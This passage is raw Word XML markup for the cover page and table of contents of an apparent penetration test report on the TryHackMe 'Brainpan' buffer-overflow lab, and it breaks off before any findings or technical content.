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2A005" w14:textId="0AC11952" w:rsidR="0008325F" w:rsidRPr="00C83FD0" w:rsidRDefault="0008325F" w:rsidP="00C83FD0">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5695C32E" wp14:editId="3A566B90">
            <wp:extent cx="4494686" cy="4107180"/>
            <wp:effectExtent l="0" t="0" r="1270" b="7620"/>
            <wp:docPr id="645281618" name="Picture 2" descr="BrainPan-Tryhackme. Exploit a buffer overflow vulnerability… | by Trevor  sau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Pan-Tryhackme. Exploit a buffer overflow vulnerability… | by Trevor  saudi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411" cy="4132515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6BCF76" w14:textId="6C583D9C" w:rsidR="36CF03A5" w:rsidRPr="00862BCA" w:rsidRDefault="0C80781B" w:rsidP="008304AD">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Walbaum Display"/>
          <w:color w:val="5066DB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00862BCA">
        <w:rPr>
          <w:rFonts w:ascii="Walbaum Display"/>
          <w:color w:val="5066DB"/>
        </w:rPr>
        <w:t>Penetration Test Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397AD63" w14:textId="61390288" w:rsidR="0C80781B" w:rsidRPr="00862BCA" w:rsidRDefault="008159B9" w:rsidP="008304AD">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Walbaum Display"/>
          <w:color w:val="5066DB"/>
          <w:sz w:val="58"/>
          <w:szCs w:val="58"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00862BCA">
        <w:rPr>
          <w:rFonts w:ascii="Walbaum Display"/>
          <w:color w:val="5066DB"/>
          <w:sz w:val="58"/>
          <w:szCs w:val="58"/>
        </w:rPr>
        <w:t>Brainpan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713DD66E" w14:textId="77777777" w:rsidR="00C83FD0" w:rsidRDefault="00C83FD0" w:rsidP="3EFF00EC"/>
    <w:p w14:paraId="1DBA4C1C" w14:textId="5AEDD629" w:rsidR="39FB324A" w:rsidRDefault="39FB324A" w:rsidP="3EFF00EC">
      <w:r w:rsidRPr="3EFF00EC">
        <w:t>Author: sh3llsh0ck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C36973" w14:textId="2EDF4227" w:rsidR="39FB324A" w:rsidRDefault="39FB324A" w:rsidP="3EFF00EC">
      <w:r w:rsidRPr="3EFF00EC">
        <w:t>Date of Audit: 06.</w:t>
      </w:r>
      <w:r w:rsidR="00C959B0">
        <w:t>20.23</w:t>
      </w:r>
      <w:r w:rsidRPr="3EFF00EC">
        <w:t xml:space="preserve"> - 06.</w:t>
      </w:r>
      <w:r w:rsidR="00C959B0">
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="3EFF00EC">
        <w:t>.23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FBFBE" w14:textId="4FF0720A" w:rsidR="39FB324A" w:rsidRDefault="39FB324A" w:rsidP="3EFF00EC">
      <w:r w:rsidRPr="3EFF00EC">
        <w:t>Date Published: N/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F5581" w14:textId="73D03EC1" w:rsidR="0087064E" w:rsidRDefault="39FB324A" w:rsidP="3EFF00EC">
      <w:r w:rsidRPr="3EFF00EC">
        <w:t>Version: 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67992CDB" w14:textId="4F1120D0" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="3EFF00EC"/>
    <w:p w14:paraId="2BF88105" w14:textId="5603E350" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="3EFF00EC"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1091931698"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="27E99F6E" w14:textId="44CF4ACD" w:rsidR="00F50AB7" w:rsidRPr="006316E7" w:rsidRDefault="00F50AB7">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Walbaum Display" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:color w:val="5066DB"/>
              <w:sz w:val="42"/>
              <w:szCs w:val="42"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006316E7">
            <w:rPr>
              <w:rFonts w:ascii="Walbaum Display" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:color w:val="5066DB"/>
              <w:sz w:val="42"/>
              <w:szCs w:val="42"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2D6B4B7C" w14:textId="3228454A" w:rsidR="0051742F" w:rsidRDefault="00F50AB7">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc141061091" w:history="1">
            <w:r w:rsidR="0051742F" w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Confidentiality </w:t>
            </w:r>
            <w:r w:rsidR="0051742F" w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Statement</w:t>
            </w:r>
            <w:r w:rsidR="0051742F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0051742F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0051742F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061091 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0051742F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0051742F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="0051742F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="083BA127" w14:textId="417EBA55" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061092" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Disclaimer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061092 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72A2051F" w14:textId="02C61E4B" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061093" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Assessment </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061093 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CAB59B1" w14:textId="552B3D80" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061094" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Timeline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061094 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="649CB6A3" w14:textId="05AEA359" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061095" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Ratings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061095 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B177529" w14:textId="4FAEB66D" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061096" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Factors</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061096 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DF69FF3" w14:textId="2161C62C" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061097" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061097 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7963296E" w14:textId="6D633378" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061098" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061098 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C396069" w14:textId="37058E3A" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061099" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061099 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70349B4C" w14:textId="5FEE67A4" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061100" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Exclusions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061100 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D3695E4" w14:textId="32FAD419" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061101" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Client</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Allowances</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061101 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2221193B" w14:textId="44144B42" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061102" w:history="1">
